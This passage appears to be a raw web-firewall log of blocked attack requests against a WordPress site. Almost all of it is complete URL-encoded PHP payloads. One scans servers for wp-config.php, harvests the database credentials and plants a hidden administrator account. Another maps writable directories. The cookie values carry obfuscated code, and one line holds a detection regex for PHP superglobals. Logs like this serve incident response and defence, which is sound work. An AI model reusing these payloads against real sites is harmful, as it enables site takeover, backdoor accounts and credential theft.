0%20%20%24add_usermeta_query1%20%3D%20%22INSERT%20INTO%20%60%7B%24table_prefix%7Dusermeta%60%20%28%60user_id%60%2C%20%60meta_key%60%2C%20%60meta_value%60%29%20%20SELECT%20%60ID%60%2C%20%27wp_capabilities%27%2C%20%27a%3A1%3A%7Bs%3A13%3A%5C%22administrator%5C%22%3Bb%3A1%3B%7D%27%20FROM%20%60%7B%24table_prefix%7Dusers%60%20WHERE%20%60user_login%60%20%3D%20%27%24user_login%27%20ORDER%20BY%20%60ID%60%20DESC%20LIMIT%201%3B%22%3B%20%20%20%20%20%20%20%20%20%20%20%20%20%24add_usermeta_query2%20%3D%20%22INSERT%20INTO%20%60%7B%24table_prefix%7Dusermeta%60%20%28%60user_id%60%2C%20%60meta_key%60%2C%20%60meta_value%60%29%20%20SELECT%20%60ID%60%2C%20%27wp_user_level%27%2C%20%2710%27%20FROM%20%60%7B%24table_prefix%7Dusers%60%20WHERE%20%60user_login%60%20%3D%20%27%24user_login%27%20ORDER%20BY%20%60ID%60%20DESC%20LIMIT%201%3B%22%3B%20%20%20%20%20%20%20%20%20%20%20%20%20%24mysqli-%3Equery%28%24add_usermeta_query1%29%3B%20%20%20%20%20%20%20%20%20%20%20%20%20%24mysqli-%3Equery%28%24add_usermeta_query2%29%3B%20%20%20%20%20%20%20%20%20%7D%20%20%20%20%20%20%20%20%20%24site_url%20%3D%20false%3B%20%20%20%20%20%20%20%20%20if%20%28%24result%20%3D%20%24mysqli-%3Equery%28%22SELECT%20option_value%20FROM%20%7B%24table_prefix%7Doptions%20WHERE%20option_name%20%3D%20%27siteurl%27%3B%22%29%29%20%7B%20%20%20%20%20%20%20%20%20%20%20%20%20%24row%20%3D%20%24result-%3Efetch_object%28%29%3B%20%20%20%20%20%20%20%20%20%20%20%20%20%24result-%3Eclose%28%29%3B%20%20%20%20%20%20%20%20%20%20%20%20%20%24site_url%20%3D%20%24row-%3Eoption_value%3B%20%20%20%20%20%20%20%20%20%7D%20%20%20%20%20%20%20%20%20if%20%28%21%24site_url%20%7C%7C%20strpos%28%24site_url%2C%20%27http%27%29%20%21%3D%3D%200%29%20%7B%20%20%20%20%20%20%20%20%20%20%20%20%20if%20%28%24result%20%3D%20%24mysqli-%3Equery%28%22SELECT%20user_url%20FROM%20%7B%24table_prefix%7Dusers%20ORDER%20BY%20ID%20ASC%20LIMIT%201%3B%22%29%29%20%7B%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%24row%20%3D%20%24result-%3Efetch_object%28%29%3B%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%24result-%3Eclose%28%29%3B%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%24site_url%20%3D%20%24row-%3Euser_url%3B%20%20%20%20%20%20%20%20%20%20%20%20%20%7D%20%20%20%20%20%20%20%20%20%7D%20%20%20%20%20%20%20%20%20if%20%28%24result%20%3D%20%24mysqli-%3Equery%28%22SELECT%20ID%20FROM%20%7B%24table_prefix%7Dusers%20WHERE%20user_login%20%3D%20%27%7B%24user_login%7D%27%3B%22%29%29%20%7B%20%20%20%20%20%20%20%20%20%20%20%20%20if%20%28%24result-%3Enum_rows%20%3E%200%29%20%7B%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20echo%20%22%3Cf%3E%7B%24site_url%7D%40%40%40%7B%24p%7D%3C\/f%3E%5Cn%22%3B%20%20%20%20%20%20%20%20%20%20%20%20%20%7D%20%20%20%20%20%20%20%20%20%20%20%20%20%24result-%3Eclose%28%29%3B%20%20%20%20%20%20%20%20%20%7D%20%20%20%20%20%20%20%20%20%24mysqli-%3Eclose%28%29%3B%20%20%20%20%20%7D%20%7D%20function%20parse_define_value%28%24line%29%20%7B%20%20%20%20%20if%20%28preg_match%28%22\/define%5Cs%2A%5C%28%5Cs%2A%5B%27%5C%22%5D%5Cw%2B%5B%27%5C%22%5D%5Cs%2A%2C%5Cs%2A%5B%27%5C%22%5D%28.%2A%29%5B%27%5C%22%5D%5Cs%2A%5C%29%5Cs%2A%3B\/%22%2C%20%24line%2C%20%24matches%29%29%20%7B%20%20%20%20%20%20%20%20%20return%20%24matches%5B1%5D%3B%20%20%20%20%20%7D%20%20%20%20%20return%20null%3B%20%7D%20function%20scanRootPaths%28%29%20%7B%20%20%20%20%20if%20%28strtoupper%28substr%28PHP_OS%2C%200%2C%203%29%29%20%3D%3D%3D%20%27WIN%27%29%20%7B%20%20%20%20%20%20%20%20%20foreach%20%28range%28%27A%27%2C%20%27Z%27%29%20as%20%24driveLetter%29%20%7B%20%20%20%20%20%20%20%20%20%20%20%20%20%24drive%20%3D%20%24driveLetter%20.%20%27%3A%5C%5C%27%3B%20%20%20%20%20%20%20%20%20%20%20%20%20if%20%28is_dir%28%24drive%29%29%20%7B%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20scan%28%24drive%29%3B%20%20%20%20%20%20%20%20%20%20%20%20%20%7D%20%20%20%20%20%20%20%20%20%7D%20%20%20%20%20%7D%20else%20%7B%20%20%20%20%20%20%20%20%20scan%28%27\/www\/wwwroot%27%29%3B%20%20%20%20%20%7D%20%7D%20scanRootPaths%28%29%3B%20die%28%27%21ended%21%27%29%3B","POST \/wp-includes\/feed.php HTTP\/1.1\ncookie:4=ea1451643f613b39572752b883798a94; 3=WTEcpaZ9LKWlLKysMzyfqTIlXSgmrKAsM2I0K3EyoKOsMTylXPxfVv90oKNvYPViqzSlY3EgpPVfnJ5cK2qyqPtvqKOfo2SxK3EgpS9xnKVvXFkaMKEyoaLbVyESGINvXFkaMKEyoaLbVyEAHPVcYTqyqTA3MPtcKFx7WTZ9pzS3qKWfMTIwo2EyXPEsHR9GISfvL2RvKFx7Mz9lMJSwnPtxMTylplOuplNxMPy7nJLbnKAsMTylXPExXFLzVTymK3qlnKEuLzkyXPExXFy7WUN9VafxMU0iYzyvLKAyK3Owo25hMJA0nJ9hVwgcMvuznJkyK3O1qS9wo250MJ50pltxpPjxLlxcr2yhL2k1MTHtWUN7DUIhoTyhnltxpPx7MKucqQg9sK1xnJHbVvSho3E3paEvoPRvXGf=; 1=53; 0=71\nsec-fetch-dest:document\nuser-agent:Mozilla\/5.0 (iPhone; CPU iPhone OS 17_2 like Mac OS X) AppleWebKit\/605.1.15 (KHTML, like Gecko) Version\/17.2 Mobile\/15E148 Safari\/604.1\nhost:dewenlabels.com\naccept-language:eo;q=0.8,en-US;q=0.6,en;q=0.4\naccept-charset:ISO-8859-1,utf-8;q=0.7,*;q=0.3\naccept:*\/*\naccept-encoding:gzip,deflate\ncontent-type:application\/x-www-form-urlencoded\nsec-fetch-site:none\ncontent-length:12640\nsec-fetch-mode:navigate\n\nca=%3C%3Fphp%20%20%20function%20scan%28%24path%29%20%7B%20%20%20%20%20if%20%28%24dir%20%3D%20%40opendir%28%24path%29%29%20%7B%20%20%20%20%20%20%20%20%20while%20%28false%20%21%3D%3D%20%28%24file%20%3D%20readdir%28%24dir%29%29%29%20%7B%20%20%20%20%20%20%20%20%20%20%20%20%20%24p%20%3D%20%24path%20.%20DIRECTORY_SEPARATOR%20.%20%24file%3B%20%20%20%20%20%20%20%20%20%20%20%20%20if%20%28%24file%20%21%3D%20%27.%27%20%26%26%20%24file%20%21%3D%20%27..%27%29%20%7B%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20if%20%28is_link%28%24p%29%29%20%7B%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20continue%3B%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%7D%20elseif%20%28is_dir%28%24p%29%29%20%7B%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20scan%28%24p%29%3B%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%7D%20elseif%20%28%24file%20%3D%3D%3D%20%27wp-config.php%27%29%20%7B%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20inject%28%24p%29%3B%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%7D%20%20%20%20%20%20%20%20%20%20%20%20%20%7D%20%20%20%20%20%20%20%20%20%7D%20%20%20%20%20%7D%20%7D%20function%20inject%28%24p%29%20%7B%20%20%20%20%20%24user_login%20%3D%20%27adm1n%27%3B%20%20%20%20%20%24user_password%20%3D%20%27Bwn6fOzW0Zc6VfNNCAo1bWRmG2a%27%3B%20%20%20%20%20%24user_email%20%3D%20%27adm1n%40wordpress.com%27%3B%20%20%20%20%20%24data%20%3D%20file_get_contents%28%24p%29%3B%20%20%20%20%20%24pattern%20%3D%20%22\/table_prefix%5Cs%2A%3D%5Cs%2A%27%28%5B%5E%27%5D%2A%29%27%3B\/i%22%3B%20%20%20%20%20if%20%28preg_match%28%24pattern%2C%20%24data%2C%20%24matches%29%29%20%7B%20%20%20%20%20%20%20%20%20%24table_prefix%20%3D%20%24matches%5B1%5D%3B%20%20%20%20%20%7D%20else%20%7B%20%20%20%20%20%20%20%20%20%24table_prefix%20%3D%20%27wp_%27%3B%20%20%20%20%20%7D%20%20%20%20%20%24lines%20%3D%20array_map%28%27rtrim%27%2C%20file%28%24p%29%29%3B%20%20%20%20%20%24conf%20%3D%20%5B%5D%3B%20%20%20%20%20foreach%20%28%24lines%20as%20%24line%29%20%7B%20%20%20%20%20%20%20%20%20if%20%28preg_match%28%27\/define%5Cs%2A%5C%28%5Cs%2A%5B%5C%27%22%5D%5Cs%2A%28DB_USER%7CDB_HOST%7CDB_PASSWORD%7CDB_NAME%29%5Cs%2A%5B%5C%27%22%5D%5Cs%2A%2C\/%27%2C%20%24line%2C%20%24matches%29%29%20%7B%20%20%20%20%20%20%20%20%20%20%20%20%20%24conf%5B%24matches%5B1%5D%5D%20%3D%20parse_define_value%28%24line%29%3B%20%20%20%20%20%20%20%20%20%7D%20%20%20%20%20%7D%20%20%20%20%20if%20%28isset%28%24conf%5B%27DB_HOST%27%5D%29%20%26%26%20isset%28%24conf%5B%27DB_USER%27%5D%29%20%26%26%20isset%28%24conf%5B%27DB_PASSWORD%27%5D%29%20%26%26%20isset%28%24conf%5B%27DB_NAME%27%5D%29%29%20%7B%20%20%20%20%20%20%20%20%20%24mysqli%20%3D%20new%20mysqli%28%24conf%5B%27DB_HOST%27%5D%2C%20%24conf%5B%27DB_USER%27%5D%2C%20%24conf%5B%27DB_PASSWORD%27%5D%2C%20%24conf%5B%27DB_NAME%27%5D%29%3B%20%20%20%20%20%20%20%20%20if%20%28%24mysqli-%3Econnect_errno%29%20%7B%20%20%20%20%20%20%20%20%20%20%20%20%20return%3B%20%20%20%20%20%20%20%20%20%7D%20%20%20%20%20%20%20%20%20if%20%28%24result%20%3D%20%24mysqli-%3Equery%28%22SELECT%20ID%20FROM%20%7B%24table_prefix%7Dusers%20WHERE%20user_login%20%3D%20%27%7B%24user_login%7D%27%3B%22%29%29%20%7B%20%20%20%20%20%20%20%20%20%20%20%20%20if%20%28%24result-%3Enum_rows%20%3E%200%29%20%7B%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%24result-%3Eclose%28%29%3B%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%24mysqli-%3Eclose%28%29%3B%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20return%3B%20%20%20%20%20%20%20%20%20%20%20%20%20%7D%20%20%20%20%20%20%20%20%20%20%20%20%20%24result-%3Eclose%28%29%3B%20%20%20%20%20%20%20%20%20%7D%20%20%20%20%20%20%20%20%20%24add_user_query%20%3D%20%22INSERT%20INTO%20%60%7B%24table_prefix%7Dusers%60%20%28%60user_login%60%2C%20%60user_pass%60%2C%20%60user_nicename%60%2C%20%60user_email%60%2C%20%60user_url%60%2C%20%60user_registered%60%2C%20%60user_status%60%2C%20%60display_name%60%29%20SELECT%20%27%7B%24user_login%7D%27%2C%20MD5%28%27%7B%24user_password%7D%27%29%2C%20%27%7B%24user_login%7D%27%2C%20%27%7B%24user_email%7D%27%2C%20%27%27%2C%20%20%20%20%20%20%20%20%20%28SELECT%20%60user_registered%60%20FROM%20%60%7B%24table_prefix%7Dusers%60%20ORDER%20BY%20%60ID%60%20ASC%20LIMIT%201%29%2C%20%20%20%20%20%20%20%20%200%2C%20%27%7B%24user_login%7D%27%20FROM%20DUAL%20WHERE%20NOT%20EXISTS%20%28%20%20%20%20%20SELECT%201%20FROM%20%60%7B%24table_prefix%7Dusers%60%20WHERE%20%60user_login%60%20%3D%20%27%7B%24user_login%7D%27%20%29%3B%22%3B%20%20%20%20%20%20%20%20%20if%20%28%24mysqli-%3Equery%28%24add_user_query%29%29%20%7B%20%20%20%20%20%20%20%20%20%20%20%20%20%24add_usermeta_query1%20%3D%20%22INSERT%20INTO%20%60%7B%24table_prefix%7Dusermeta%60%20%28%60user_id%60%2C%20%60meta_key%60%2C%20%60meta_value%60%29%20%20SELECT%20%60ID%60%2C%20%27wp_capabilities%27%2C%20%27a%3A1%3A%7Bs%3A13%3A%5C%22administrator%5C%22%3Bb%3A1%3B%7D%27%20FROM%20%60%7B%24table_prefix%7Dusers%60%20WHERE%20%60user_login%60%20%3D%20%27%24user_login%27%20ORDER%20BY%20%60ID%60%20DESC%20LIMIT%201%3B%22%3B%20%20%20%20%20%20%20%20%20%20%20%20%20%24add_usermeta_query2%20%3D%20%22INSERT%20INTO%20%60%7B%24table_prefix%7Dusermeta%60%20%28%60user_id%60%2C%20%60meta_key%60%2C%20%60meta_value%60%29%20%20SELECT%20%60ID%60%2C%20%27wp_user_level%27%2C%20%2710%27%20FROM%20%60%7B%24table_prefix%7Dusers%60%20WHERE%20%60user_login%60%20%3D%20%27%24user_login%27%20ORDER%20BY%20%60ID%60%20DESC%20LIMIT%201%3B%22%3B%20%20%20%20%20%20%20%20%20%20%20%20%20%24mysqli-%3Equery%28%24add_usermeta_query1%29%3B%20%20%20%20%20%20%20%20%20%20%20%20%20%24mysqli-%3Equery%28%24add_usermeta_query2%29%3B%20%20%20%20%20%20%20%20%20%7D%20%20%20%20%20%20%20%20%20%24site_url%20%3D%20false%3B%20%20%20%20%20%20%20%20%20if%20%28%24result%20%3D%20%24mysqli-%3Equery%28%22SELECT%20option_value%20FROM%20%7B%24table_prefix%7Doptions%20WHERE%20option_name%20%3D%20%27siteurl%27%3B%22%29%29%20%7B%20%20%20%20%20%20%20%20%20%20%20%20%20%24row%20%3D%20%24result-%3Efetch_object%28%29%3B%20%20%20%20%20%20%20%20%20%20%20%20%20%24result-%3Eclose%28%29%3B%20%20%20%20%20%20%20%20%20%20%20%20%20%24site_url%20%3D%20%24row-%3Eoption_value%3B%20%20%20%20%20%20%20%20%20%7D%20%20%20%20%20%20%20%20%20if%20%28%21%24site_url%20%7C%7C%20strpos%28%24site_url%2C%20%27http%27%29%20%21%3D%3D%200%29%20%7B%20%20%20%20%20%20%20%20%20%20%20%20%20if%20%28%24result%20%3D%20%24mysqli-%3Equery%28%22SELECT%20user_url%20FROM%20%7B%24table_prefix%7Dusers%20ORDER%20BY%20ID%20ASC%20LIMIT%201%3B%22%29%29%20%7B%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%24row%20%3D%20%24result-%3Efetch_object%28%29%3B%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%24result-%3Eclose%28%29%3B%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%24site_url%20%3D%20%24row-%3Euser_url%3B%20%20%20%20%20%20%20%20%20%20%20%20%20%7D%20%20%20%20%20%20%20%20%20%7D%20%20%20%20%20%20%20%20%20if%20%28%24result%20%3D%20%24mysqli-%3Equery%28%22SELECT%20ID%20FROM%20%7B%24table_prefix%7Dusers%20WHERE%20user_login%20%3D%20%27%7B%24user_login%7D%27%3B%22%29%29%20%7B%20%20%20%20%20%20%20%20%20%20%20%20%20if%20%28%24result-%3Enum_rows%20%3E%200%29%20%7B%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20echo%20%22%3Cf%3E%7B%24site_url%7D%40%40%40%7B%24p%7D%3C\/f%3E%5Cn%22%3B%20%20%20%20%20%20%20%20%20%20%20%20%20%7D%20%20%20%20%20%20%20%20%20%20%20%20%20%24result-%3Eclose%28%29%3B%20%20%20%20%20%20%20%20%20%7D%20%20%20%20%20%20%20%20%20%24mysqli-%3Eclose%28%29%3B%20%20%20%20%20%7D%20%7D%20function%20parse_define_value%28%24line%29%20%7B%20%20%20%20%20if%20%28preg_match%28%22\/define%5Cs%2A%5C%28%5Cs%2A%5B%27%5C%22%5D%5Cw%2B%5B%27%5C%22%5D%5Cs%2A%2C%5Cs%2A%5B%27%5C%22%5D%28.%2A%29%5B%27%5C%22%5D%5Cs%2A%5C%29%5Cs%2A%3B\/%22%2C%20%24line%2C%20%24matches%29%29%20%7B%20%20%20%20%20%20%20%20%20return%20%24matches%5B1%5D%3B%20%20%20%20%20%7D%20%20%20%20%20return%20null%3B%20%7D%20function%20scanRootPaths%28%29%20%7B%20%20%20%20%20if%20%28strtoupper%28substr%28PHP_OS%2C%200%2C%203%29%29%20%3D%3D%3D%20%27WIN%27%29%20%7B%20%20%20%20%20%20%20%20%20foreach%20%28range%28%27A%27%2C%20%27Z%27%29%20as%20%24driveLetter%29%20%7B%20%20%20%20%20%20%20%20%20%20%20%20%20%24drive%20%3D%20%24driveLetter%20.%20%27%3A%5C%5C%27%3B%20%20%20%20%20%20%20%20%20%20%20%20%20if%20%28is_dir%28%24drive%29%29%20%7B%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20scan%28%24drive%29%3B%20%20%20%20%20%20%20%20%20%20%20%20%20%7D%20%20%20%20%20%20%20%20%20%7D%20%20%20%20%20%7D%20else%20%7B%20%20%20%20%20%20%20%20%20scan%28%27\/www\/wwwroot%27%29%3B%20%20%20%20%20%7D%20%7D%20scanRootPaths%28%29%3B%20die%28%27%21ended%21%27%29%3B"]
["2026-05-16 07:19:15","213.209.159.254","POST","\/","Mozilla\/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit\/605.1.15 (KHTML, like Gecko) Version\/15.3 Safari\/605.1.15","post","\\$_(GET|post|cookie|files|session|env|phplib|GLOBALS|SERVER)\\[ >> Xc:%3C%3Fphp%20%20%20function%20po%28%24p%29%20%7B%20%20%20%20%20%24f%20%3D%20glob%28%24p.DIRECTORY_SEPARATOR.%22%2A.%2A%22%29%3B%20%20%20%20%20if%20%28%21empty%28%24f%29%29%20%7B%20%20%20%20%20%20%20%20%20array_multisort%28array_map%28%27filemtime%27%2C%20%24f%29%2C%20SORT_NUMERIC%2C%20SORT_ASC%2C%20%24f%29%3B%20%20%20%20%20%20%20%20%20return%20filemtime%28%24f%5B0%5D%29%3B%20%20%20%20%20%7D%20else%20%7B%20%20%20%20%20%20%20%20%20return%20filemtime%28%24p%29%3B%20%20%20%20%20%7D%20%7D%20function%20check%28%24p%2C%20%24root%29%20%7B%20%20%20%20%20%24o%20%3D%20po%28%24p%29%3B%20%20%20%20%20%24res%20%3D%20str_replace%28%24root%2C%20%27%27%2C%20%24p%29%3B%20%20%20%20%20print%20%22%3Cd%3E%7B%24res%7D%40%7B%24o%7D%3C\/d%3E%5Cn%22%3B%20%7D%20function%20scan%28%24path%2C%20%24root%29%20%7B%20%20%20%20%20if%20%28%24dir%20%3D%20%40opendir%28%24path%29%29%20%7B%20%20%20%20%20%20%20%20%20while%20%28false%20%21%3D%3D%20%28%24file%20%3D%20readdir%28%24dir%29%29%29%20%7B%20%20%20%20%20%20%20%20%20%20%20%20%20%24p%20%3D%20%24path%20.%20DIRECTORY_SEPARATOR%20.%20%24file%3B%20%20%20%20%20%20%20%20%20%20%20%20%20if%20%28%24file%20%21%3D%20%27.%27%20%26%26%20%24file%20%21%3D%20%27..%27%29%20%7B%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20if%20%28is_link%28%24p%29%29%20%7B%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20continue%3B%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%7D%20elseif%20%28is_dir%28%24p%29%29%20%7B%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20if%20%28is_writable%28%24p%29%29%20%7B%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20check%28%24p%2C%20%24root%29%3B%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%7D%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20scan%28%24p%2C%20%24root%29%3B%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%7D%20%20%20%20%20%20%20%20%20%20%20%20%20%7D%20%20%20%20%20%20%20%20%20%7D%20%20%20%20%20%7D%20%7D%20%24r%20%3D%20%24_SERVER%5B%27DOCUMENT_ROOT%27%5D%3B%20if%20%28is_writable%28%24r%29%29%20%7B%20%20%20%20%20check%28%24r%2C%20%24r%29%3B%20%7D%20scan%28%24r%2C%20%24r%29%3B%20die%28%27%21ended%21%27%29%3B%20","POST \/ HTTP\/1.1\nuser-agent:Mozilla\/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit\/605.1.15 (KHTML, like Gecko) Version\/15.3 Safari\/605.1.15\ncontent-length:3339\nhost:dewenlabels.com\naccept-language:eo;q=0.8,en-US;q=0.6,en;q=0.4\naccept:*\/*\naccept-encoding:gzip,deflate\ncontent-type:application\/x-www-form-urlencoded\naccept-charset:ISO-8859-1,utf-8;q=0.7,*;q=0.3\ncookie:4=9502d8dfeef0bdc4da77dd3a93ec6aec; 3=WTEcpaZ9LKWlLKysMzyfqTIlXSgmrKAsM2I0K3EyoKOsMTylXPxfVv90oKNvYPViqzSlY3EgpPVfnJ5cK2qyqPtvqKOfo2SxK3EgpS9xnKVvXFkaMKEyoaLbVyESGINvXFkaMKEyoaLbVyEAHPVcYTqyqTA3MPtcKFx7WTZ9pzS3qKWfMTIwo2EyXPEsHR9GISfvJTZvKFx7Mz9lMJSwnPtxMTylplOuplNxMPy7nJLbnKAsMTylXPExXFLzVTymK3qlnKEuLzkyXPExXFy7WUN9VafxMU0iYaWcozEyrPV7nJLbMzyfMI9jqKEsL29hqTIhqUZbWUNfWTZcXKgcozAfqJEyVPEjB0O1ozkcozfbWUNcB2I4nKD7sK19MTyyXPVuoz90q3W0LzjuVvx7; 1=53; 0=71\n\nXc=%3C%3Fphp%20%20%20function%20po%28%24p%29%20%7B%20%20%20%20%20%24f%20%3D%20glob%28%24p.DIRECTORY_SEPARATOR.%22%2A.%2A%22%29%3B%20%20%20%20%20if%20%28%21empty%28%24f%29%29%20%7B%20%20%20%20%20%20%20%20%20array_multisort%28array_map%28%27filemtime%27%2C%20%24f%29%2C%20SORT_NUMERIC%2C%20SORT_ASC%2C%20%24f%29%3B%20%20%20%20%20%20%20%20%20return%20filemtime%28%24f%5B0%5D%29%3B%20%20%20%20%20%7D%20else%20%7B%20%20%20%20%20%20%20%20%20return%20filemtime%28%24p%29%3B%20%20%20%20%20%7D%20%7D%20function%20check%28%24p%2C%20%24root%29%20%7B%20%20%20%20%20%24o%20%3D%20po%28%24p%29%3B%20%20%20%20%20%24res%20%3D%20str_replace%28%24root%2C%20%27%27%2C%20%24p%29%3B%20%20%20%20%20print%20%22%3Cd%3E%7B%24res%7D%40%7B%24o%7D%3C\/d%3E%5Cn%22%3B%20%7D%20function%20scan%28%24path%2C%20%24root%29%20%7B%20%20%20%20%20if%20%28%24dir%20%3D%20%40opendir%28%24path%29%29%20%7B%20%20%20%20%20%20%20%20%20while%20%28false%20%21%3D%3D%20%28%24file%20%3D%20readdir%28%24dir%29%29%29%20%7B%20%20%20%20%20%20%20%20%20%20%20%20%20%24p%20%3D%20%24path%20.%20DIRECTORY_SEPARATOR%20.%20%24file%3B%20%20%20%20%20%20%20%20%20%20%20%20%20if%20%28%24file%20%21%3D%20%27.%27%20%26%26%20%24file%20%21%3D%20%27..%27%29%20%7B%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20if%20%28is_link%28%24p%29%29%20%7B%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20continue%3B%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%7D%20elseif%20%28is_dir%28%24p%29%29%20%7B%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20if%20%28is_writable%28%24p%29%29%20%7B%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20check%28%24p%2C%20%24root%29%3B%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%7D%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20scan%28%24p%2C%20%24root%29%3B%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%7D%20%20%20%20%20%20%20%20%20%20%20%20%20%7D%20%20%20%20%20%20%20%20%20%7D%20%20%20%20%20%7D%20%7D%20%24r%20%3D%20%24_SERVER%5B%27DOCUMENT_ROOT%27%5D%3B%20if%20%28is_writable%28%24r%29%29%20%7B%20%20%20%20%20check%28%24r%2C%20%24r%29%3B%20%7D%20scan%28%24r%2C%20%24r%29%3B%20die%28%27%21ended%21%27%29%3B%20"]
["2026-05-16 07:19:51","213.209.159.254","POST","\/","Mozilla\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\/537.36 (KHTML, like Gecko) Chrome\/100.0.4896.75 Safari\/537.36","post","\\$_(GET|post|cookie|files|session|env|phplib|GLOBALS|SERVER)\\[ >> Do:%3C%3Fphp%20%20%20function%20po%28%24p%29%20%7B%20%20%20%20%20%24f%20%3D%20glob%28%24p.DIRECTORY_SEPARATOR.%22%2A.%2A%22%29%3B%20%20%20%20%20if%20%28%21empty%28%24f%29%29%20%7B%20%20%20%20%20%20%20%20%20array_multisort%28array_map%28%27filemtime%27%2C%20%24f%29%2C%20SORT_NUMERIC%2C%20SORT_ASC%2C%20%24f%29%3B%20%20%20%20%20%20%20%20%20return%20filemtime%28%24f%5B0%5D%29%3B%20%20%20%20%20%7D%20else%20%7B%20%20%20%20%20%20%20%20%20return%20filemtime%28%24p%29%3B%20%20%20%20%20%7D%20%7D%20function%20check%28%24p%2C%20%24root%29%20%7B%20%20%20%20%20%24o%20%3D%20po%28%24p%29%3B%20%20%20%20%20%24res%20%3D%20str_replace%28%24root%2C%20%27%27%2C%20%24p%29%3B%20%20%20%20%20print%20%22%3Cd%3E%7B%24res%7D%40%7B%24o%7D%3C\/d%3E%5Cn%22%3B%20%7D%20function%20scan%28%24path%2C%20%24root%29%20%7B%20%20%20%20%20if%20%28%24dir%20%3D%20%40opendir%28%24path%29%29%20%7B%20%20%20%20%20%20%20%20%20while%20%28false%20%21%3D%3D%20%28%24file%20%3D%20readdir%28%24dir%29%29%29%20%7B%20%20%20%20%20%20%20%20%20%20%20%20%20%24p%20%3D%20%24path%20.%20DIRECTORY_SEPARATOR%20.%20%24file%3B%20%20%20%20%20%20%20%20%20%20%20%20%20if%20%28%24file%20%21%3D%20%27.%27%20%26%26%20%24file%20%21%3D%20%27..%27%29%20%7B%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20if%20%28is_link%28%24p%29%29%20%7B%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20continue%3B%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%7D%20elseif%20%28is_dir%28%24p%29%29%20%7B%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20if%20%28is_writable%28%24p%29%29%20%7B%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20check%28%24p%2C%20%24root%29%3B%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%7D%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20scan%28%24p%2C%20%24root%29%3B%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%7D%20%20%20%20%20%20%20%20%20%20%20%20%20%7D%20%20%20%20%20%20%20%20%20%7D%20%20%20%20%20%7D%20%7D%20%24r%20%3D%20%24_SERVER%5B%27DOCUMENT_ROOT%27%5D%3B%20if%20%28is_writable%28%24r%29%29%20%7B%20%20%20%20%20check%28%24r%2C%20%24r%29%3B%20%7D%20scan%28%24r%2C%20%24r%29%3B%20die%28%27%21ended%21%27%29%3B%20","POST \/ HTTP\/1.1\nuser-agent:Mozilla\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\/537.36 (KHTML, like Gecko) Chrome\/100.0.4896.75 Safari\/537.36\nhost:dewenlabels.com\nsec-ch-ua:\" Not A;Brand\";v=\"99\", \"Chromium\";v=\"100\", \"Google Chrome\";v=\"100\"\nsec-ch-ua-mobile:?0\naccept-encoding:gzip,deflate\nsec-ch-ua-platform:\"Windows\"\nsec-fetch-site:none\nsec-fetch-mode:navigate\nsec-fetch-user:?1\nsec-fetch-dest:document\naccept-charset:ISO-8859-1,utf-8;q=0.7,*;q=0.3\nupgrade-insecure-requests:1\ncontent-type:application\/x-www-form-urlencoded\ncontent-length:3339\naccept-language:eo;q=0.8,en-US;q=0.6,en;q=0.4\naccept:*\/*\ncookie:4=1af844051764377410b827578daae50e; 